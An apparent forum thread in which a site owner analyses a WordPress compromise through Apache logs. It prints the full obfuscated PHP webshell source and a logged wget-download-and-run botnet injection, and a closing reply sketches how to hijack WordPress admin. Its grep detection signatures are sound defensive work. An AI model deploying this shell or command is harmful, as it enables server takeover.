access.log.5.gz:162.158.91.230 - - [30/Dec/2019:19:20:05 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.92.193 - - [30/Dec/2019:19:20:36 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz= HTTP/1.1" 500 297 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.90.171 - - [30/Dec/2019:19:20:37 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../../../../../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.91.230 - - [30/Dec/2019:19:21:07 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../../../../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.92.105 - - [30/Dec/2019:19:21:37 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../../../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.91.230 - - [30/Dec/2019:19:22:07 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.92.235 - - [30/Dec/2019:19:22:37 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.91.184 - - [30/Dec/2019:19:23:07 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 500 297 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.90.171 - - [30/Dec/2019:19:23:12 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz= HTTP/1.1" 500 297 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:141.101.104.116 - - [30/Dec/2019:19:23:15 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../../../../../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.89.190 - - [30/Dec/2019:19:23:45 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../../../../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.91.56 - - [30/Dec/2019:19:24:15 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../../../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.94.77 - - [30/Dec/2019:19:24:45 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.91.56 - - [30/Dec/2019:19:25:15 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.91.124 - - [30/Dec/2019:19:25:45 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 500 297 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.89.190 - - [30/Dec/2019:19:25:46 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz= HTTP/1.1" 500 297 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.92.105 - - [30/Dec/2019:19:44:24 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.94.53 - - [30/Dec/2019:19:44:55 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.91.184 - - [30/Dec/2019:19:45:55 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:172.69.55.61 - - [30/Dec/2019:19:45:25 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.92.235 - - [30/Dec/2019:20:33:40 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.88.95 - - [30/Dec/2019:19:44:25 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:141.101.77.155 - - [30/Dec/2019:20:33:40 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.92.235 - - [30/Dec/2019:20:34:10 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.92.109 - - [30/Dec/2019:20:35:10 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.92.109 - - [30/Dec/2019:20:34:40 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.90.21 - - [01/Jan/2020:08:08:20 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.92.105 - - [01/Jan/2020:08:08:21 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.88.197 - - [01/Jan/2020:08:10:01 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.91.184 - - [01/Jan/2020:08:11:41 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.90.171 - - [01/Jan/2020:08:13:22 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.69.55.25 - - [22/Dec/2019:16:02:21 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:162.158.111.184 - - [22/Dec/2019:16:02:21 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 206 1672 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.69.54.180 - - [22/Dec/2019:16:02:24 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 206 701 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.69.54.204 - - [22/Dec/2019:16:02:27 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 206 5272 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.244.231 - - [24/Dec/2019:06:19:55 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.10.193 - - [24/Dec/2019:06:19:55 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 5638 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.10.169 - - [24/Dec/2019:06:21:52 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.244.243 - - [24/Dec/2019:06:21:53 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 5638 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.11.74 - - [24/Dec/2019:06:33:43 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.10.193 - - [24/Dec/2019:06:33:52 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 5638 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.244.57 - - [26/Dec/2019:23:48:53 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.245.208 - - [26/Dec/2019:23:48:54 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 464 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.245.184 - - [28/Dec/2019:17:24:34 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.10.193 - - [28/Dec/2019:17:24:38 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 40955 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.11.74 - - [28/Dec/2019:17:40:10 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.10.193 - - [28/Dec/2019:17:40:12 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 40955 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.244.231 - - [28/Dec/2019:19:07:04 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.244.93 - - [28/Dec/2019:19:08:04 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.10.193 - - [28/Dec/2019:19:07:34 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.10.169 - - [28/Dec/2019:19:07:04 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.7.gz:141.101.77.113 - - [20/Dec/2019:13:47:49 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.7.gz:141.101.76.19 - - [20/Dec/2019:13:47:50 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 519 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:58 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 369 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:141.101.104.116 - - [11/Dec/2019:10:21:28 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:172.69.55.37 - admin [11/Dec/2019:10:21:29 -0500] "PUT /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 200 291 "-" "Go-http-client/1.1"

access.log.8.gz:141.101.104.212 - - [11/Dec/2019:10:21:30 -0500] "GET /wp-content/uploads/2019/12/wp-simple-plugin.php?d1=dmFyX2R1bXAoIi0tbGQtLSIpOw==&q=dmFyX2R1bXAoIi0tbGQtLSIpOw==&d=dmFyX2R1bXAoIi0tbGQtLSIpOw== HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

error.log.5.gz:Saving to: `wp-simple-plugin.php'

error.log.5.gz:2020-01-01 08:08:22 (70.9 MB/s) - `wp-simple-plugin.php' saved [1087/1087]

error.log.5.gz:Saving to: `wp-simple-plugin.php'

error.log.5.gz:2020-01-01 08:10:02 (70.2 MB/s) - `wp-simple-plugin.php' saved [1087/1087]

error.log.5.gz:Saving to: `wp-simple-plugin.php'

error.log.5.gz:2020-01-01 08:11:42 (68.0 MB/s) - `wp-simple-plugin.php' saved [1087/1087]

error.log.5.gz:Saving to: `wp-simple-plugin.php'

error.log.5.gz:2020-01-01 08:13:22 (39.5 MB/s) - `wp-simple-plugin.php' saved [1087/1087]

error.log.5.gz:Saving to: `wp-simple-plugin.php'

error.log.5.gz:2020-01-01 08:29:09 (46.6 MB/s) - `wp-simple-plugin.php' saved [1087/1087]

error.log.5.gz:Saving to: `wp-simple-plugin.php'

error.log.5.gz:2020-01-01 08:29:38 (136 MB/s) - `wp-simple-plugin.php' saved [1087/1087]

error.log.5.gz:Saving to: `wp-simple-plugin.php'

error.log.5.gz:2020-01-01 08:31:32 (172 MB/s) - `wp-simple-plugin.php' saved [1087/1087]

error.log.5.gz:Saving to: `wp-simple-plugin.php'

error.log.5.gz:2020-01-01 08:33:02 (149 MB/s) - `wp-simple-plugin.php' saved [1087/1087]



Do apparently this d1= shit is popular, lol:

Code:
access.log.13.gz:141.101.104.116 - - [07/Nov/2019:15:57:25 -0500] "GET /wp-content/plugins/super-socialat/super_socialat.php?d1=ZGllKG1kNSgzNDM0KSk7 HTTP/1.1" 404 4632 "CUSTOMERCOMPANY.com" "Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37"
access.log.45.gz:172.68.143.117 - - [30/Mar/2019:21:05:20 -0400] "GET /wp-craft-report.php?d1=ZGllKG1kNSgzNDUzNCkpOw== HTTP/1.1" 404 4630 "http://www.google.com" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36"
access.log.46.gz:108.162.229.7 - - [20/Mar/2019:23:06:52 -0400] "GET /wp-craft-report.php?d1=ZGllKG1kNSgzNDUzNCkpOw== HTTP/1.1" 404 4630 "http://www.google.com" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36"
access.log.46.gz:162.158.59.109 - - [21/Mar/2019:18:40:56 -0400] "GET /wp-content/plugins/super-socialat/super_socialat.php?d1=ZGllKG1kNSgzNDUzNCkpOw== HTTP/1.1" 404 4630 "http://www.google.com" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36"
access.log.49.gz:108.162.226.8 - - [25/Feb/2019:08:33:41 -0500] "GET / HTTP/1.1" 200 6104 "http://ManlyCUSTOMER.com/.well-known/wp-craft-report.php?d1=ZWNobyAiZmdkZmczNDU2MyI7" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
access.log.49.gz:103.22.200.231 - - [25/Feb/2019:08:33:42 -0500] "GET / HTTP/1.1" 200 6096 "http://ManlyCUSTOMER.com/.well-known/wp-craft-report.php?d1=ZWNobyAiZmdkZmczNDU2MyI7" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
access.log.49.gz:103.22.200.135 - - [25/Feb/2019:08:33:43 -0500] "GET / HTTP/1.1" 200 6097 "http://ManlyCUSTOMER.com/.well-known/wp-craft-report.php.suspected?d1=ZWNobyAiZmdkZmczNDU2MyI7" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
access.log.49.gz:103.22.200.231 - - [25/Feb/2019:08:33:46 -0500] "GET / HTTP/1.1" 200 6099 "http://ManlyCUSTOMER.com/.well-known/wp-build-report.php?d1=ZWNobyAiZmdkZmczNDU2MyI7" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
access.log.49.gz:108.162.226.38 - - [25/Feb/2019:08:33:47 -0500] "GET / HTTP/1.1" 200 6101 "http://ManlyCUSTOMER.com/.well-known/wp-build-report.php.suspected?d1=ZWNobyAiZmdkZmczNDU2MyI7" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
access.log.49.gz:162.158.114.115 - - [25/Feb/2019:22:12:20 -0500] "GET /.well-known/wp-craft-report.php?d1=ZWNobyAiZmdkZmczNDU2MyI7 HTTP/1.1" 404 4630 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
access.log.49.gz:162.158.114.97 - - [25/Feb/2019:22:12:24 -0500] "GET /.well-known/wp-craft-report.php?d1=ZWNobyAiZmdkZmczNDU2MyI7 HTTP/1.1" 404 4630 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
access.log.8.gz:141.101.104.212 - - [11/Dec/2019:10:21:30 -0500] "GET /wp-content/uploads/2019/12/wp-simple-plugin.php?d1=dmFyX2R1bXAoIi0tbGQtLSIpOw==&q=dmFyX2R1bXAoIi0tbGQtLSIpOw==&d=dmFyX2R1bXAoIi0tbGQtLSIpOw== HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"



After gazing into these shitty scripts, I realize a similarity many of these h0m0 things do, they use GET and .php? somewhere. Skkkiiididdddzzzzssssoooooosss.



Fine, h03:

Code:
/var/log/apache2# zgrep -a "GET /" *gz | grep ".php?"



Imma zgrep y00.



Okay, this is just too fun - now I am targeting stuff..

Code:
cd /var/log/apache2

#or

/var/log/httpd



... umm I am just posting the logs elsewhere they're long lol. Pastebin I guess..

Okay, so I archived this crap over to here:

This is nicer:

kinda look like le poop poop - but works for all purposes.

Just copy/pasta this to a text editor if you want to inspect closely.
 

Asphyxia

Owner
Administrator
Apr 25, 2015
1,845
2
2,199
327
Sharing source code to this malicious PoS:
Code:
<?php if(isset($_POST[chr(97).chr(115).chr(97).chr(118).chr(115).chr(100).chr(118).chr(100).chr(115)]) && md5($_POST[chr(108).chr(103).chr(107).chr(102).chr(103).chr(104).chr(100).chr(102).chr(104)]) == chr(101).chr(57).chr(55).chr(56).chr(55).chr(97).chr(100).chr(99).chr(53).chr(50).chr(55).chr(49).chr(99).chr(98).chr(48).chr(102).chr(55).chr(54).chr(53).chr(50).chr(57).chr(52).chr(53).chr(48).chr(51).chr(100).chr(97).chr(51).chr(102).chr(50).chr(100).chr(99)) { $a = chr(109).chr(110);     $n1 = chr(102).chr(105).chr(108).chr(101).chr(95);$n2 = chr(112).chr(117).chr(116).chr(95);$n3 = $n1.$n2.chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115);$b1 = chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$b2 = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).$b1;     $z1 = chr(60).chr(63).chr(112).chr(104).chr(112).chr(32);     $z2 = $z1.$b2($_REQUEST[chr(100).chr(49)]);     $z3 = $b2($_REQUEST[chr(100).chr(49)]);     @$n3($a,$z2);     @include($a);@unlink($a);     $a = chr(47).chr(116).chr(109).chr(112).chr(47).$a;     @$n3($a,$z2);     @include($a);@unlink($a);die();  } else { $cbb = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101); echo $cbb(chr(78).chr(68).chr(65).chr(48).chr(76).chr(83).chr(49).chr(108).chr(99).chr(110).chr(74).chr(118).chr(99).chr(103).chr(61).chr(61)); }

Want to detect this thing?
I just found a VERY simple signature these files share in common with a low false-positive.. the way they positioned md5 right after a special char:
Code:
cd /var/www
grep -rnw './' -e "& md5"

This should show every infected.

DETECTION:
Code:
cd /tmp/
grep -rnw '/tmp' -e "file_get_contents"
grep -rnw '/var/www' -e "& md5"

If you see any of the above, these are characteristics of the infectious files. They appear to have gained access via outdated adminer cve:

Basically.. someone logs into your stuff using adminer root/localhost/defaults everything. Then they get you.. seems REAL easy..?
 

Asphyxia

Owner
Administrator
Apr 25, 2015
1,845
2
2,199
327
Code:
wordpress_http_access.log.3.gz:62.86.203.177 - - [06/Feb/2020:18:04:40 +0000] "GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear%60 HTTP/1.1" 400 157 "-" "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)"


Apparently some Italy scanner bullsh*t using "dark_nexus_qbot", also Dark Nexus is mentioned here https://www.proofpoint.com/us/daily-ruleset-update-summary-20191230

tl;dr scanners are trying to bust WordPress regularly. Interesting intel..

Threat intelligence updated over here: https://otx.alienvault.com/pulse/5e1760de6ed0dd1a18c77feb/history
 

Asphyxia

Owner
Administrator
Apr 25, 2015
1,845
2
2,199
327
How can i take over wordpress admin of a target?
Why would you want to take over WordPress admin? It is a matter of finding a vulnerable plugin usually, then you inject malicious database queries to either steal admin, inject your own admin account, or in some way exploit their WordPress installation to gain access.. I could show you an example if you want but I am not doing this for malicious purposes. I think information should be free to learn how to defend..
 
Top